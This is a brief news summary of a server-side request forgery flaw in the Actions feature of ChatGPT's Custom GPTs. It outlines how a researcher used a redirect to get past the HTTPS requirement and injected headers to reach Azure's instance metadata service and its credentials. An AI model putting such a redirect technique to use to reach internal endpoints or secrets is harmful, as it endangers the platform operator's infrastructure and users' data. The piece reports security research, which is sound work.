ChatGPT Hacked Using Custom GPTs Exploiting SSRF Vulnerability to Expose Secrets

Source: Cyber Security News

A Server-Side Request Forgery (SSRF) vulnerability in OpenAI’s ChatGPT, found in the Custom GPT ‘Actions’ feature, allowed attackers to access internal cloud metadata, endangering sensitive Azure credentials. This flaw was identified by Open Security during experimentation, emphasizing the risks of user-controlled URL handling. SSRF vulnerabilities enable attackers to coerce servers into querying unintended resources, potentially bypassing firewalls and extracting privileged data.

Research indicated that as cloud adoption increases, SSRF dangers intensify, particularly with major providers exposing metadata endpoints that contain critical instance details. The researcher, while working with the Custom GPT tools, utilized the ‘Actions’ feature to initiate calls to external APIs. Initial tests failed due to the HTTPS requirement, but a redirect technique allowed experimentation to succeed in accessing Azure’s Instance Metadata Service by injecting required headers with API keys.

👉 Pročitaj original: Cyber Security News